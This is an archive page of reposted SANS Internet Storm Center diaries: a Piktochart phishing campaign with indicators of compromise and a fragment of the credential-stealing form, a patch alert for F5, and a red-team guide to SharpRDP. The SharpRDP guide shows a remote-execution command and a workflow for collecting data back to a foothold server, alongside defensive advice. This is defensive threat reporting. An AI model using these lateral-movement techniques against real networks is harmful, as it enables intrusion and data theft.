Archive for March 10th, 2021

Piktochart – Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]

In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail[1] and pretending to be an Outlook version update[2], we’ve recently learned of a phishing campaign targetting users of the Infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools.  This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool, like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

Piktochart has about 2,000 registered users, and about 24 million Piktocharts Created and is used by companies such as Forbes, TechCrunch, and others, according to their website.  With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing:  Their registered “Pro users” can download an actual .pdf file, with the malicious link intact, or as well render the file into several different sizes of .png images, as indicated in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew, whose account had already been compromised.  If they click the link, a 2nd stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org.  This base domain currently has “0 out of 87” vendors reporting it as malicious on Virus Total, and is made out to be a non-profit in Lagos, Nigeria.  This specific example had a different site registration than most of the other, identical sites I’ve researched, so it is possible this site was the result of a takeover of a legitimate business’ WordPress website, or a redirection of the site’s DNS.

Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft 0365 credentials, and evidence points to the same IP being used for a large variety of credential theft sites.   There are  quite a few  domains on the same IP[5], for example: 

secure-official-spotify.pwanplus(.)com  – This one includes a nice-looking DHL form [6]

Indicators of compromise – IOCs  

URLS/Domains (if not needed for businses)

2nd stage/stealer

%%ip: [7]

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microssoft cred stealer image – hashes(sha2) 
7, 10, and 3kb versions of the same image

DOM (cred-stealer page)

Post request
“form id=”f2″ method=”post” action=”#” style=”margin-bottom: 0px;”> <input required="" type="email" placeholder="Email, phone, or Skype" name="e"
    style=”outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;”> <img

Cookies    1969-12-31
23:59:59    Name: PHPSESSID    1969-12-31
23:59:59    Name: ip11

 JB Bowers

[1] –
[2] –
[3] –
[4] –
[5] –
[6] –
[7] –


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

If you have an F5, it's time to patch! Thanks Michele for the link to today's crop of F5 CVE's, which include an unauthenticated RCE against the API, and another RCE against "hidden" config pages!, (Wed, Mar 10th)

=============== Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

SharpRDP – PSExec without PSExec, PSRemoting without PowerShell, (Wed, Mar 10th)

With the amount of remediation folks have these days to catch malicious execution of powershell or the use of tools like psexec, red teams have to be asking themselves – what approach is next for lateral movement after you get that first foothold?

For me, if the easy stuff isn’t an option, SharpRDP makes a pretty easy “next tool on the shelf”

SharpRDP takes advantage of the fact that Microsoft took a lot of pages from the Citrix ICA protocol when they put the RDP protocol together.  RDP isn’t just for remote desktop – it implements “channels” which can be used for all sorts of things.  In the past, the most common use of channels in ICA is to differentiate printer traffic from interactive traffic, and apply different QOS policies to it.  But SharpRDP takes it to the next level, and allows you to start a session, and instruct it to execute code after it starts!

For the red team, this has oodles of attraction – often you don’t have a GUI, and this lets you run pretty much anything you want on a remote host over a traditionally “GUI” protocol.  Since it’s in an RDP session, it’s an actual terminal session (not a shell), so all of your inputs and outputs are handled correctly.  While you could theoretically run a CLI terminal session over this, I’m not sure that this is implemented – I haven’t needed to figure that piece out yet if it is.  

For someone on the blue team, this is a tough thing to catch – it’s going to look like any other RDP session that your admins might make, executing “something” after it starts.  

What does a session look like?  It’s as simple as:

>SharpRDP.exe computername=targetservername command=”” username=> password=
[+] Connected to          :  targetservername
[+] Execution priv type   :  non-elevated
[+] Executing
[+] Disconnecting from    :  targetservername
[+] Connection closed     :  targetservername

Normally I’ll have the “command” be a CMD file that does whatever I’m trying to accomplish – usually it’s data collection of some kind, with the data coming back to the host that I have my foot-hold on.  Remember that if your command is not an actual executable (for instance, “dir” is not an executable file. it’s part of cmd.exe), you will have to use “c:windowssystem32cmd.exe /c” to load the cmd interpreter prior to executing your “thing”.

My go-to is single letter CMD files, so for instance t.cmd.  This file is usually homed on my foot-hold server, and sends the data back to a share on that same server.  Also the output normally has %COMPUTERNAME% in the filename so I can keep the files straight (and not have name collisions).

Protections?  LAPS is a good one – if every target host has a different password, you’ll have to collect all of that first before you can use SharpRDP.  (  Really though if an attacker is far enough in to fire up RDP sessions to arbitrary hosts, harvesting the LAPS passwords isn’t too tough, once you figure out that LAPS is in play.  MFA on RDP sessions is really your best bet.  I’ve got a few clients running this, and it’s pretty slick.  Most MFA solutions allow you to extend RDP authentication, usually it’s a “click OK” or a biometric confirmation (Face-ID usually) on your phone to complete the RDP session.

If you’ve got MFA on your servers for RDP access, then SharpRDP use is defeated nicely, and your detection that you can code into your SIEM is whatever event is generated by “failed MFA on RDP”.  Your next-level protection in that case is “alert on any new registration of MFA users”.  You’ll want any registration of new users, or registration of new phones to existing users to go to a number of people – once MFA is a main protection, it also of course becomes a main target.

All that being said, MFA on RDP is not widely implemented in March of 2021 – there are a lot of people working on fixing this though.  The uptick in migrating VPN’s and Citrix Gateways to newer MFA solutions means that it’s becoming much easier to extend MFA to more and more platforms, and RDP is one of the easier and more impactful ones that we see picked.

SharpRDP is homed here:
And has a full write-up here:


Rob VandenBrink
[email protected]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →